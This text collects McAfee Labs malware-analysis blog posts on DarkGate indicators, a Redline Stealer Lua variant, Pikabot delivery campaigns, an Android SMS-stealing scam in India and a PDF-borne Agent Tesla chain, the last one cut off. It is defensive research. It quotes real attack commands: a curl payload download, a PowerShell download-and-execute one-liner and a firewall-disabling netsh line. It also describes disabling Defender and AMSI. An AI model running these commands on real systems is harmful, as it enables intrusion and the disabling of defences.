URL file	2b296ffc6d173594bae63d37e2831ba21a59ce385b87503710dc9ca439ed7833
VBS	038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907
autohotkey.exe	897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb
AHK script	dd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455
test.txt	4de0e0e7f23adc3dd97d498540bd8283004aa131a59ae319019ade9ddef41795
DarkGate exe	6ed1b68de55791a6534ea96e721ff6a5662f2aefff471929d23638f854a80031
IP	5.252.177.207
XLS file	1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4
VBS	2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f
LNK file	10e362e18c355b9f8db9a0dbbc75cf04649606ef96743c759f03508b514ad34e
IP	103.124.106.237

Table 1: IOC table

The post The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen appeared first on McAfee Blog.

Redline Stealer: A Novel Approach

Authored by Mohansundaram M and Neil Tyagi

A new packed variant of the Redline Stealer trojan was observed in the wild, leveraging Lua bytecode to perform malicious behavior.

McAfee telemetry data shows this malware strain is very prevalent, covering North America, South America, Europe, and Asia and reaching Australia.

Infection Chain

 

• GitHub was being abused to host the malware file at Microsoft’s official account in the vcpkg repository https[:]//github[.]com/microsoft/vcpkg/files/14125503/Cheat.Lab.2.7.2.zip

• McAfee Web Advisor blocks access to this malicious download
• Cheat.Lab.2.7.2.zip is a zip file with hash 5e37b3289054d5e774c02a6ec4915a60156d715f3a02aaceb7256cc3ebdc6610
• The zip file contains an MSI installer.

• The MSI installer contains 2 PE files and a purported text file.
  
• Compiler.exe and lua51.dll are binaries from the Lua project. However, they are modified slightly by a threat actor to serve their purpose; they are used here with readme.txt (Which contains the Lua bytecode) to compile and execute at Runtime.
• Lua JIT is a Just-In-Time Compiler (JIT) for the Lua programming language.
  
• The magic number 1B 4C 4A 02 typically corresponds to Lua 5.1 bytecode.
• The above image is readme.txt, which contains the Lua bytecode. This approach provides the advantage of obfuscating malicious stings and avoiding the use of easily recognizable scripts like wscript, JScript, or PowerShell script, thereby enhancing stealth and evasion capabilities for the threat actor.
• Upon execution, the MSI installer displays a user interface.

• During installation, a text message is displayed urging the user to spread the malware by installing it onto a friend’s computer to get the full application version.

• During installation, we can observe that three files are being written to Disk to C:\program Files\Cheat Lab Inc\ Cheat Lab\ path.

• Below, the three files are placed inside the new path.

 

• • Here, we see that compiler.exe is executed by msiexec.exe and takes readme.txt as an argument. Also, the Blue Highlighted part shows lua51.dll being loaded into compiler.exe. Lua51.dll is a supporting DLL for compiler.exe to function, so the threat actor has shipped the DLL along with the two files.
    

• • During installation, msiexec.exe creates a scheduled task to execute compiler.exe with readme.txt as an argument.
  • Apart from the above technique for persistence, this malware uses a 2^nd fallback technique to ensure execution.
  • It copies the three files to another folder in program data with a very long and random path.

• Note that the name compiler.exe has been changed to NzUW.exe.
• Then it drops a file ErrorHandler.cmd at C:\Windows\Setup\Scripts\
• The contents of cmd can be seen here. It executes compiler.exe under the new name of NzUw.exe with the Lua byte code as a parameter.

• Executing ErrorHandler.cmd uses a LolBin in the system32 folder. For that, it creates another scheduled task.

 

• • The above image shows a new task created with Windows Setup, which will launch C:\Windows\system32\oobe\Setup.exe without any argument.
  • Turns out, if you place your payload in c:\WINDOWS\Setup\Scripts\ErrorHandler.cmd, c:\WINDOWS\system32\oobe\Setup.exe will load it whenever an error occurs.
    

 

Source: Add a Custom Script to Windows Setup | Microsoft Learn

• • c:\WINDOWS\system32\oobe\Setup.exe is expecting an argument. When it is not provided, it causes an error, which leads to the execution of ErrorHandler.cmd, which executes compiler.exe, which loads the malicious Lua code.
  • We can confirm this in the below process tree.
    

We can confirm that c:\WINDOWS\system32\oobe\Setup.exe launches cmd.exe with ErrorHandler.cmd script as argument, which runs NzUw.exe(compiler.exe)

• • It then checks the IP from where it is being executed and uses ip-API to achieve that.

 

• • We can see the network packet from api-api.com; this is written as a JSON object to Disk in the inetCache folder.
    

• • We can see procmon logs for the same.
    

• We can see JSON was written to Disk.

C2 Communication and stealer activity

• • Communication with c2 occurs over HTTP.

• • We can see that the server sent the task ID of OTMsOTYs for the infected machine to perform. (in this case, taking screenshots)
    
  • A base64 encoded string is returned.

• • 

• • An HTTP PUT request was sent to the threat actors server with the URL /loader/screen.
  • IP is attributed to the redline family, with many engines marking it as malicious.
    
    

• Further inspection of the packet shows it is a bitmap image file.
• The name of the file is Screen.bmp
• Also, note the unique user agent used in this put request, i.e., Winter

• After Dumping the bitmap image resource from Wireshark to disc and opening it as a .bmp(bitmap image) extension, we see.
• The screenshot was sent to the threat actors’ server.

Analysis of bytecode File

• It is challenging to get the true decomplication of the bytecode file.
• Many open source decompilers were used, giving a slightly different Lua script.
• The script file was not compiling and throwing some errors.

• The script file was sensitized based on errors so that it could be compiled.

• Debugging process

• One table (var_0_19) is populated by passing data values to 2 functions.
• In the console output, we can see base64 encoded values being stored in var_0_19.
• These base64 strings decode to more encoded data and not to plain strings.

• All data in var_0_19 is assigned to var_0_26

• • The same technique is populating 2nd table (var_0_20)
  • It contains the substitution key for encoded data.
    

• • The above pic is a decryption loop. It iterates over var_0_26 element by element and decrypts it.
  • This loop is also very long and contains many junk lines.
  • The loop ends with assigning the decrypted values back to var_0_26.
    
    

 

• • We place the breakpoint on line 1174 and watch the values of var_0_26.
    

• • As we hit the breakpoint multiple times, we see more encoded data decrypted in the watch window.
    

 

• We can see decrypted strings like Tamper Detected! In var_0_26

Loading luajit bytcode:

Before loading the luajit bytecode, a new state is created. Each Lua state maintains its global environment, stack, and set of loaded libraries, providing isolation between different instances of Lua code.

It loads the library using the Lua_openlib function and loads the debug, io, math,ffi, and other supported libraries,

Lua jit bytecode loaded using the luaL_loadfile export function from lua51. It uses the fread function to read the jit bytecode, and then it moves to the allocated memory using the memmove function.

 

The bytecode from the readme. Text is moved randomly, changing the bytecode from one offset to another using the memmove API function. The exact length of 200 bytes from the Jit bytecode is copied using the memmove API function.

It took table values and processed them using the below floating-point arithmetic and xor instruction.

It uses memmove API functions to move the bytes from the source to the destination buffer.

After further analysis, we found that c definition for variable and arguments which will be used in this script.

We have seen some API definitions, and it uses ffi for directly accessing Windows API functions from Lua code, examples of defining API functions,

 

It creates the mutex with the name winter750 using CreateMutexExW.

It Loads the dll at Runtime using the LdrLoaddll function from ntdll.dll. This function is called using luajit ffi.

It retrieves the MachineGuid from the Windows registry using the RegQueryValueEx function by using ffi. Opens the registry key “SOFTWARE\\Microsoft\\Cryptography” using RegOpenKeyExA—queries the value of “MachineGuid” from the opened registry key.

It retrieves the ComputerName from the Windows registry using the GetComputerNameA function using ffi.

It gathers the following information and sends it to the C2 server.

It also sends the following information to the c2 server,

• In this blog, we saw the various techniques threat actors use to infiltrate user systems and exfiltrate their data.

Indicators of Compromise

Cheat.Lab.2.7.2.zip	5e37b3289054d5e774c02a6ec4915a60156d715f3a02aaceb7256cc3ebdc6610
Cheat.Lab.2.7.2.zip	https[:]//github[.]com/microsoft/vcpkg/files/14125503/Cheat.Lab.2.7.2.zip
lua51.dll	873aa2e88dbc2efa089e6efd1c8a5370e04c9f5749d7631f2912bcb640439997
readme.txt	751f97824cd211ae710655e60a26885cd79974f0f0a5e4e582e3b635492b4cad
compiler.exe	dfbf23697cfd9d35f263af7a455351480920a95bfc642f3254ee8452ce20655a
Redline C2	213[.]248[.]43[.]58
Trojanised Git Repo	hxxps://github.com/microsoft/STL/files/14432565/Cheater.Pro.1.6.0.zip

 

The post Redline Stealer: A Novel Approach appeared first on McAfee Blog.

Distinctive Campaign Evolution of Pikabot Malware

Authored by Anuradha and Preksha

Introduction

PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a loader and a core component. The core module performs malicious operations, allowing for the execution of commands and the injection of payloads from a command-and-control server. The malware employs a code injector to decrypt and inject the core module into a legitimate process. Notably, PikaBot employs distribution methods, campaigns, and behavior reminiscent of Qakbot.

Distribution Methods

PikaBot, along with various other malicious loaders like QBot and DarkGate, heavily depends on email spam campaigns for distribution. Its initial access strategies are intricately crafted, utilizing geographically targeted spam emails tailored for specific countries. These emails frequently include links to external Server Message Block (SMB) shares hosting malicious zip files.

SMB shares refer to resources or folders on a server or computer accessible to other devices or users on a network using the SMB protocol. The threat actors frequently exploit such shares for malware distribution. In this instance, the act of downloading and opening the provided zip file leads to PikaBot infection.

Distinctive Campaigns

During February 2024, McAfee Labs observed a significant change in the campaigns that distribute Pikabot.

Pikabot is distributed through multiple file types for various reasons, depending on the objectives and nature of the attack. Using multiple file types allows attackers to exploit diverse attack vectors. Different file formats may have different vulnerabilities, and different ways of detection by security software so attackers may try various formats to increase their chances of success and evade detection by bypassing specific security measures.

Attackers often use file types that are commonly trusted by users, such as Zip or Office documents, to trick users into opening them. By using familiar file types, attackers increase the likelihood that their targets will interact with the malicious content. Malware authors use HTML with JavaScript features as attachments, a common technique, particularly when email formatting is converted to plain text, resulting in the attachment of the HTML content directly to the email. Attackers use SMB to propagate across the network and may specifically target SMB shares to spread their malware efficiently. Pikabot takes advantage of the MonikerLink bug and attaches an SMB link in the Outlook mail itself.

Figure 1. Distinctive Campaigns of Pikabot

Attackers demonstrated a diverse range of techniques and infection vectors in each campaign, aiming to deliver the Pikabot payload. Below we have summarized the infection vector that has been used in each campaign.

1. HTML
2. Javascript
3. SMB Share
4. Excel
5. JAR

It is uncommon for an adversary to deploy so many attack vectors in the span of a month.

Campaign Analysis

In this section, a comprehensive breakdown of the analysis for each campaign is presented below.

1.HTML Campaign

In this campaign, Pikabot is distributed through a zip file that includes an HTML file. This HTML file then proceeds to download a text file, ultimately resulting in the deployment of the payload.

The below HTML code is a snippet from the malware where it is a properly aligned HTML that has a body meta redirection to a remote text file hosted at the specified URL. There are distractions in the HTML which are not rendered by the browser.

Figure 2.HTML Code

The above highlighted meta tag triggers an immediate refresh of the page and redirects the browser to the specified URL: ‘file://204.44.125.68/mcqef/yPXpC.txt’. This appears to be a file URL, pointing to a text file on a remote server.

Here are some reasons why an attacker might choose a meta tag refresh over traditional redirects:

Stealth and Evasion: Meta tag refreshes can be less conspicuous than HTTP redirects. Some security tools and detection mechanisms may be more focused on identifying and blocking known redirect patterns.

Client-Side Execution: Meta tag refreshes occur on the client side (in the user’s browser), whereas HTTP redirects are typically handled by the server. This may allow attackers to execute certain actions directly on the user’s machine, making detection and analysis more challenging.

Dynamic Behavior: Meta tag refreshes can be dynamically generated and inserted into web pages, allowing attackers to change the redirection targets more easily and frequently. This dynamic behavior can make it harder for security systems to keep up with the evolving threat landscape.

In this campaign, McAfee blocks the HTML file.

Figure 3.HTML file

2. Javascript Campaign

Distributed through a compressed zip file, the package includes a .js file that subsequently initiates the execution of curl.exe to retrieve the payload.

Infection Chain:

.zip->.js->curl->.exe

Code snippet of .js file:

Figure 4. Javascript Code

When the JavaScript is executed, it triggers cmd.exe to generate directories on the C: drive and initiates curl.exe to download the payload.

Since the URL “hxxp://103.124.105.147/KNaDVX/.dat” is inactive, the payload is not downloaded to the below location.

Commandline:

‘”C:\Windows\System32\cmd.exe” /c mkdir C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh & curl hxxp://103.124.105.147/KNaDVX/0.2642713404338389.dat –output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe’

McAfee blocks both the javascript and the exe file thus rendering McAfee customers safe from this campaign.

Figure 5. JS file

Figure 6. EXE file

3. SMB share Campaign:

In this campaign, Malware leverages the MonikerLink bug by distributing malware through email conversations with older thread discussions, wherein recipients receive a link to download the payload from an SMB share. The link is directly present in that Outlook mail.

Infection Chain:

EML ->SMB share link->.zip->.exe

Spam Email:

Figure 7. Spam email with SMB share link

SMB Share link: file://newssocialwork.com/public/FNFY.zip

In this campaign, McAfee successfully blocks the executable file downloaded from the SMB share.

Figure 8. EXE file

 4: Excel Campaign

Figure 9. Face in Excel

Infection Chain:

.zip >.xls > .js > .dll

This week, threat actors introduced a novel method to distribute their Pikabot malware. Targeted users received an Excel spreadsheet that prompted them to click on an embedded button to access “files from the cloud.”

Upon hovering over the “Open” button, we can notice an SMB file share link -file:///\\85.195.115.20\share\reports_02.15.2024_1.js.

Bundled files in Excel:

Figure 10. Bundled files inside Excel

The Excel file doesn’t incorporate any macros but includes a hyperlink directing to an SMB share for downloading the JavaScript file.

The hyperlink is present in the below relationship file.

Figure 11. XML relationship file

Content of relationship file:

Figure 12. xl/drawings/_rels/drawing1.xml.rels

Code of JS file:

Figure 13. Obfuscated javascript code

The JS file contains mostly junk codes and a small piece of malicious code which downloads the payload DLL file saved as “nh.jpg”.

Figure 14. Calling regsvr32.exe

The downloaded DLL payload is executed by regsvr32.exe.

In this campaign, McAfee blocks the XLSX file.

Figure 15. XLSX file

5.JAR Campaign

In this campaign, distribution was through a compressed zip file, the package includes a .jar file which on execution drops the DLL file as payload.

Infection Chain:

.zip>.jar>.dll

On extraction, the below files are found inside the jar file.

Figure 16. Extraction of JAR file

The MANIFEST file indicates that hBHGHjbH.class serves as the Main-Class in the provided files.

The jar file on execution loads the file “163520” as a resource and drops it as .png to the %temp% location which is the payload DLL file.

Figure 17. Payload with .png extension

Following this, java.exe initiates the execution of regsvr32.exe to run the payload.

In this campaign, McAfee blocks both the JAR and DLL files.

Figure 18. JAR file

Figure 19. DLL file

Pikabot Payload Analysis:

Pikabot loader:

Due to a relatively high entropy of the resource section, the sample appears packed.

Figure 20. Loader Entropy

Initially, Malware allocates memory using VirtualAlloc (), and subsequently, it employs a custom decryption loop to decrypt the data, resulting in a PE file.

Figure 21. Decryption Loop

Figure 22. Decrypted to get the PE file

Core Module:

Once the data is decrypted, it proceeds to jump to the entry point of the new PE file. When this PE file gets executed, it injects the malicious content in ctfmon.exe with the command line argument “C:\Windows\SysWOW64\ctfmon.exe -p 1234”

Figure 23. Injection with ctfmon.exe

To prevent double infection, it employs a hardcoded mutex value {9ED9ADD7-B212-43E5-ACE9-B2E05ED5D524} by calling CreateMutexW(), followed by a call to GetLastError() to check the last error code.

Figure 24. Mutex

Network communication:

Malware collects the data from the victim machine and sends it to the C2 server.

Figure 25. Network activity

PIKABOT performs network communication over HTTPS on non-traditional ports (2221, 2078, etc).

Figure 26. Network activity

C2 server communication:

Figure 27. C2 communication

IOCs:

C2 found in the payload are:

178.18.246.136:2078

86.38.225.106:2221

57.128.165.176:1372

File Type	SHA 256
ZIP	800fa26f895d65041ddf12c421b73eea7f452d32753f4972b05e6b12821c863a
HTML	9fc72bdf215a1ff8c22354aac4ad3c19b98a115e448cb60e1b9d3948af580c82
ZIP	4c29552b5fcd20e5ed8ec72dd345f2ea573e65412b65c99d897761d97c35ebfd
JS	9a4b89276c65d7f17c9568db5e5744ed94244be7ab222bedd8b64f25695ef849
EXE	89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9
ZIP	f3f1492d65b8422125846728b320681baa05a6928fbbd25b16fa28b352b1b512
EXE	aab0e74b9c6f1326d7ecea9a0de137c76d52914103763ac6751940693f26cbb1
XLSX	bcd3321b03c2cba73bddca46c8a509096083e428b81e88ed90b0b7d4bd3ba4f5
JS	49d8fb17458ca0e9eaff8e3b9f059a9f9cf474cc89190ba42ff4f1e683e09b72
ZIP	d4bc0db353dd0051792dd1bfd5a286d3f40d735e21554802978a97599205bd04
JAR	d26ab01b293b2d439a20d1dffc02a5c9f2523446d811192836e26d370a34d1b4
DLL	7b1c5147c903892f8888f91c98097c89e419ddcc89958a33e294e6dd192b6d4e

 

 

The post Distinctive Campaign Evolution of Pikabot Malware appeared first on McAfee Blog.

Android Phishing Scam Using Malware-as-a-Service on the Rise in India

Authored by ZePeng Chen and Wenfeng Yu 

McAfee Mobile Research Team has observed an active scam malware campaign targeting Android users in India. This malware has gone through three stages. The first one is the development stage, from March 2023 to July 2023, during which a couple of applications were created each month. The second is the expansion stage, from August 2023 to October 2023, during which dozens of applications were created each month. The third is the active stage, from September 2023 to the present, during which hundreds of applications were created each month. According to McAfee’s detection telemetry data, this malware has accumulated over 800 applications and has infected more than 3,700 Android devices. The campaign is still ongoing, and the number of infected devices will continue to rise. 

Malware developers create phishing pages for scenarios that are easy to deceive, such as electricity bill payments, hospital appointments, and courier package bookings. Developers use different applications to load different phishing pages, which are eventually sold to scammers. In our research, more than 100 unique phishing URLs and more than 100 unique C2 URLs are created in these malicious applications. It means that each scammer can carry out scam activities independently. 

Scammers use malware to attack victims. They typically contact victims via phone, text, email, or social applications to inform them that they need to reschedule services. This kind of fraud attack is a typical and effective fraud method. As a result, victims are asked to download a specific app, and submit personal information. There was a report where an Indian woman downloaded malware from a link in WhatsApp and about ₹98,000 was stolen from her. We were not able to confirm if is the same malware, but it is just one example of how these malicious applications can be distributed directly via WhatsApp. 

The attack scenario appears credible, many victims do not doubt the scammers’ intentions. Following the instructions provided, they download and installed the app. In the app, victims are induced to submit sensitive information such as personal phone numbers, addresses, bank card numbers, and passwords. Once this information falls into the hands of scammers, they can easily steal funds from the victim’s bank account.  

The malware not only steals victims’ bank account information via phishing web pages but also steals SMS messages on victims’ devices. Because of the stolen information, even if the bank account supports OTP authentication, the scammer can transfer all the funds. The malware uses legitimate platforms to deploy phishing pages to make it appear more trustworthy to evade detection.  

McAfee Mobile Security detects this threat as Android/SmsSpy. For more information, and to get fully protected, visit McAfee Mobile Security. 

Malware-as-a-Service (MaaS) 

We discovered that these phishing pages and malware were being sold as a service by a cyber group named ELVIA INFOTECH. A distinct difference between this malware and others is that the apps sold have a valid expiration date. When the expiration date is reached, some application links will redirect to a payment notification page. The notification is clearly to request the purchaser to pay a fee to restore the use of the malware. 

Figure 1. Payment notification. 

We also discovered that the cybercriminal group was selling malware in a Telegram group. Based on these observations, we believe that ELVIA INFOTECH is a professional cybercriminal organization engaged in the development, maintenance, and sale of malware and phishing websites. 

 

Figure 2. Telegram Group conversation. 

Malware Analysis 

This malware has been maintained and recently updated, and hundreds of malicious applications were created. They like to use the file names such as “CustomerSupport.apk”, “Mahavitaran Bill Update.apk”, “Appointment Booking.apk”, “Hospital Support.apk”, “Emergency Courier.apk” and the application names such as “Customer Support”, “Blue Dart”, “Hospital Support”,” Emergency Courier” to trick victims, below are some applications’ names and icons.  

Figure 3. Some applications’ names and icons 

Not only do they pretend to be “Customer Support”, but they also pretend to be popular courier companies like “Blue Dart” in India, but they also target utility companies like “Mahavitaran” (Power Corporation of India). 

Once victims click the fake icon, the application will be launched and start to attack victims. 

1. Loading Phishing Pages

The phishing page loads once the application is launched. It will disguise itself as a page of various legitimate services, making victims believe that they are visiting a legitimate service website. Here, victims are tricked into providing sensitive information such as name, address, phone number, bank card number, and password. However, once submitted, this information falls into the hands of scammers, allowing them to easily access and control the victim’s bank account. 

We found that most of this attack campaign impersonated carrier package delivery companies. 

 

Figure 4. Phishing Pages Load Once App Launches 

The malware developers also designed different phishing pages for different applications to deceive victims in different scenarios that exploit electricity bill payments and hospital appointments. 

 

Figure 5. Hospital appointment and Electricity Bill Phishing Pages 

2. Stealing One-Time Passwords via SMS message 

As a core design of this malware, the application requests permissions to allow it to send and view SMS messages once it launches.   

Figure 6. Request SMS permissions. 

If victims click the “Allow” button, the malware starts a background service that secretly monitors users’ text messages and forwards them to a number which is from C2 server.  

 

 

Figure 7. Forward phone number from C2 server 

This step is crucial for the scam process, as many banks send a one-time password (OTP) to the customer’s phone for transaction verification. Using this method, the scammers can obtain these OTPs and successfully complete bank transactions. 

Conclusion: 

This malicious app and the developers behind it have emerged rapidly in India from last year to now, purposefully developing and maintaining malware, and focusing on deploying well-designed phishing websites through legitimate platforms. The group secretly promotes and sells its malware through social media platforms, making the spread of the malware more subtle and difficult to detect. This tactic resulted in an even more severe malware outbreak, posing an ongoing and serious threat to the financial security of Indian users. 

Malware campaigns are very persistent and using multiple different applications on different websites can trick many victims into installing these applications and providing their private and personal information, which can then be used to commit fraud. In this environment, ordinary users in India face huge cybersecurity challenges. Therefore, users need to remain vigilant and cautious when dealing with any electronic communications or application download requests that appear legitimate but may contain malware. We strongly recommend users install security software on their devices and always keep it up to date. By using McAfee Mobile Security products, users can further protect their devices and reduce the risks associated with this type of malware, providing a more secure experience. 

Indicators of Compromise (IOCs) 

SHA256 hash List: 

• 092efedd8e2e0c965290154b8a6e2bd5ec19206f43d50d339fa1485f8ff6ccba  
• 7b1f692868df9ff463599a486658bcdb862c1cf42e99ec717e289ddb608c8350  
• c59214828ed563ecc1fff04efdfd2bff0d15d411639873450d8a63754ce3464c  
• b0df37a91b93609b7927edf4c24bfdb19eecae72362066d555278b148c59fe85  
• 07ad0811a6dac7435f025e377b02b655c324b7725ab44e36a58bc68b27ce0758  
• c8eb4008fa4e0c10397e0fb9debf44ca8cbadc05663f9effbeac2534d9289377  
• 1df43794618ef8d8991386f66556292429926cd7f9cf9b1837a08835693feb40  
• 5b3d8f85f5637b217e6c97e6b422e6b642ce24d50de4a6f3a6b08c671f1b8207 

Phishing URLs: 

• hxxps://bijlipayupdate[.]wixsite[.]com/my-site  
• hxxps://appointmentservice0[.]wixsite[.]com/onlineappointment  
• hxxps://couriers9343[.]wixsite[.]com/courier/  
• hxxps://doctorappointment34[.]wixsite[.]com/appointmentbooking  
• hxxps://hospitalservice402[.]wixsite[.]com/hospital-in  
• hxxps://adn-reg[.]com/website 

C2 Server URLs: 

• hxxps://forexroyality[.]online/complainf13/My_File[.]txt  
• hxxps://adn-reg[.]com/data[.]json  
• hxxps://icustomrcore[.]com/chand3/data[.]json  
• hxxps://sms[.]hrms[.]org[.]in/chugxgddhmurgiwalabhaiqwertadmin/no[.]html  
• hxxps://krishna[.]salaar[.]co[.]in/admindata[.]txt  
• hxxps://courier[.]elviainfotech[.]cloud/pages/phone[.]json 

The post Android Phishing Scam Using Malware-as-a-Service on the Rise in India appeared first on McAfee Blog.

Rise in Deceptive PDF: The Gateway to Malicious Payloads

Authored by Yashvi Shah and Preksha Saxena

McAfee Labs has recently observed a significant surge in the distribution of prominent malware through PDF files. Malware is not solely sourced from dubious websites or downloads; certain instances of malware may reside within apparently harmless emails, particularly within the PDF file attachments accompanying them. The subsequent trend observed in the past three months through McAfee telemetry pertains to the prevalence of malware distributed through non-portable executable (non-PE) vectors.

 

Figure 1: Rise in PDF malware

Why PDF?

Upon implementing Microsoft‘s macro-blocking measures for Internet-delivered Office files, threat actors were compelled to devise alternative methods for email malware distribution. The complex structure of PDF files renders them susceptible to exploitation, posing significant challenges in detecting malicious content within. As a commonly employed file format distributed via email attachments in the consumer domain, PDFs represent an enticing avenue for attackers to deceive users into believing they are benign. Exploiting this trust, attackers can readily craft PDF-based malware, often containing payloads hosted on malicious websites. Upon user interaction, such as clicking a link, these PDFs download the hosted payload, exacerbating the risk of infection.

Infection Chain

This emerging infection chain involving, among others, Agent Tesla, initiates from an email containing a PDF attachment, which subsequently facilitates the dissemination of the ultimate payload. In the outdated and unpatched version of Acrobat Reader, PDFs directly execute embedded JavaScript using MSHTA, subsequently launching PowerShell, which facilitates process injection. Conversely, in the latest version of Acrobat Reader, PDFs are unable to execute JavaScript directly. Instead, they redirect to a malicious website, from which the script is downloaded. The subsequent process remains consistent with the previous case. The kill chain for the delivery of Agent Tesla unfolds as follows:

Figure 2: Infection Chain

Initial Access:

Firstly, we shall address the scenario involving the updated version of Acrobat Reader, as it is likely that the majority of users will have this version installed. Typically, these PDF files are disguised under various themes such as invoices featuring a prominent download button, messages prompting immediate action, or buttons designed to redirect users to seemingly benign destinations.

In a recent attack, a file named “Booking.com-1728394029.pdf” was used. It is evidently targeting users under the guise of being affiliated with Booking.com. It displays a prompt stating, “Lettore non è compatibile!”, which translates to “Player is not compatible,” as depicted in the provided Figure below.

Figure 3: Face of PDF attachment

Upon examining the internal structure of the PDF (Figure 4), it was discovered that within one of the seven objects, some hex data and an embedded URL were identified. The URL highlighted in the red box “https://bit[.]ly/newbookingupdates” is a Bitly URL. Attackers use Bitly URLs to hide malicious links, making them harder to detect. This is especially useful in phishing schemes where they trick users into revealing sensitive information. Bitly’s dynamic links allow attackers to change destinations, enhancing their ability to evade detection. Additionally, attackers exploit the trust associated with Bitly to improve the success of their social engineering tactics.

This URL is intended to connect to https://bio0king[.]blogspot[.]com

Figure 4: Embedded data in PDF

The text in yellow highlighted in Figure 4, appears to be in hexadecimal format. Upon converting it to ASCII, the result is as follows:

Figure 5: ASCII Conversion

This is the reason behind the prompt observed in Figure 3, displaying the same alert message upon opening the PDF document.

After clicking “OK,” another prompt appeared from Adobe Player, cautioning about the connection established to the address mentioned in the prompt i.e. “bit.ly”.

Figure 6: Connection to embedded URL

Upon granting permission for redirection, the user is directed to the website “https://bio0king[.]blogspot[.]com”. Thus, an attempt is made to disguise itself as a legitimate Booking.com website. As illustrated in the figure below, Microsoft Defender SmartScreen alerts the user to the harmful nature of this website. Despite the warning, further analysis was conducted by proceeding to the website to observe subsequent actions.

Figure 7: Connection to disguised website

Upon accessing the website, it was observed that a JavaScript file named “Booking.com-1728394029.js” was promptly downloaded. The js file was intentionally named identically to the PDF file in an effort to deceive users into opening it.

Figure 8: Prompt of JS file download

Immediately upon initiating the download, redirection is triggered to the legitimate Booking.com website, aiming to prevent users from detecting any suspicious activity. The downloaded file is stored in the Downloads folder on the user’s system.

Figure 9: JS file downloaded

The content of the JavaScript file is heavily obfuscated. This tactic is commonly employed by attackers to conceal their code, thus complicating analysis efforts and evading detection mechanisms.

Figure 10: JS file content

Execution:

Upon executing the JavaScript, the following process tree was observed:

Figure 11: Process tree

Command line:

• “C:\Windows\System32\WScript.exe” ” C:\Users\admin\Downloads\ Booking.com-1728394029.js”
  • “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm htloctmain25.blogspot.com/////////////////////////atom.xml) | . (‘i*x’).replace(‘*’,’e’);Start-Sleep -Seconds 5
    • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    • “C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe” /noconfig /fullpaths @”C:\Users\admin\AppData\Local\Temp\mk2qsd2s.cmdline”
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 “/OUT:C:\Users\admin\AppData\Local\Temp\RES6D2D.tmp” “c:\Users\admin\AppData\Local\Temp\CSC7C83DF075A344945AED4D733783D6D80.TMP”
    • “C:\Windows\system32\netsh.exe” advfirewall set allprofiles state off -ErrorAction SilentlyContinue
    • “C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe”

Upon decoding and executing “Booking.com-1728394029.js,” a URL was acquired: “htloctmain25.blogspot.com/////////////////////////atom.xml.”

Using the PowerShell command line, an attempt was made to access the file located at htloctmain25.blogspot.com/////////////////////////atom.xml, followed by executing the file using Invoke-Expression (iex). In this instance, the attackers attempted to obfuscate the Invoke-Expression (iex) command by using the replace command within the PowerShell command line. As illustrated in the command line, a sleep command was implemented, pausing execution for 5 seconds. Subsequent stages of the infection proceeded after this interval.

The file hosted at http://htloctmain25.blogspot.com/////////////////////////atom.xml is named atom.ps1, measuring approximately 5.5 MB in size. The figure below depicts the content of the file:

Figure 12: Content of .ps1 file

Let’s begin deciphering this script shown in Figure 11 with reference:

The Red marked content at the top of the script indicates that it will terminate several specified processes (“RegSvcs”, “mshta”, “wscript”, “msbuild”, “FoxitPDFReader”), presumably with the intention of injecting the final payload into one of these legitimate binaries. Furthermore, the script creates a directory at “C:\ProgramData\MINGALIES” for potential future utilization.

The Blue marked content within the script represents the decryption function, labeled as “asceeeeeeeeeeeeeeee”. This function is subsequently employed to decrypt various variables within the script.

The Green marked content towards the end of the script outlines the implementation of the persistence mechanism and describes the injection process into legitimate executables.

For reference and ease of comprehension, the variables defined in the script have been numbered accordingly. The decryption instructions for these variables are highlighted in Yellow for clarity and emphasis.

Following the sequence of instructions, if any of the specified processes are terminated, the script proceeds to define variables 1 and 2. Subsequently, the decryption loop is defined in the script. After the decryption loop, variable 3, named “Phudigum”, is defined in the script. Following that, the script decrypts variable 3 and executes the obtained decoded data using the Invoke-Expression (IEX) command.

Defense Evasion:

The content of the decoded variable 3 is as follows:

Figure 13: Variable 3 after decryption

The code first bypasses the Microsoft Windows Anti-Malware Scan Interface (AMSI) scanning by setting a specific value and then proceeds to create registry entries for persistence. The script also defines functions for interacting with the system’s memory and sets global error action preferences to silently continue, suppressing any errors. It checks if a type named AMSIReaper exists and if not, defines this type with various declarations for interacting with the Windows kernel32.dll, including functions related to process memory manipulation.

Furthermore, the script executes a series of malicious actions aimed at compromising the security of the system. It begins by adding exclusions for specific file extensions, paths, and processes in Windows Defender, effectively evading detection for these items. Subsequently, it attempts to alter various Windows Defender preferences, such as disabling critical security features like the Intrusion Prevention System, Real-time Monitoring, and Script Scanning, while also adjusting settings related to threat actions and reporting. Furthermore, the script tries to modify registry settings associated with User Account Control (UAC) and disable the Windows Firewall, further weakening the system’s defenses. Lastly, it resets the global error action preference to continue, potentially concealing any errors encountered during execution and ensuring the script’s malicious actions remain undetected. Overall, these actions indicate a concerted effort to compromise the system’s security and potentially enable further malicious activities.

Privilege Escalation:

The subsequent instruction in Figure 11 involves decrypting variable 2, labeled as “bulgumchupitum,” utilizing the decryption function “asceeeeeeeeeeeeeeee.” And the same is executed by Invoke-Expression (IEX) command. Following is the decoded content of variable 2:

Figure 14: Variable 2 after decryption

The content obtained after decrypting variable 2 holds significant importance. The highlighted section in Red does the following:

• Introduces another decryption function specifically tailored for this script, named “kimkarden.”
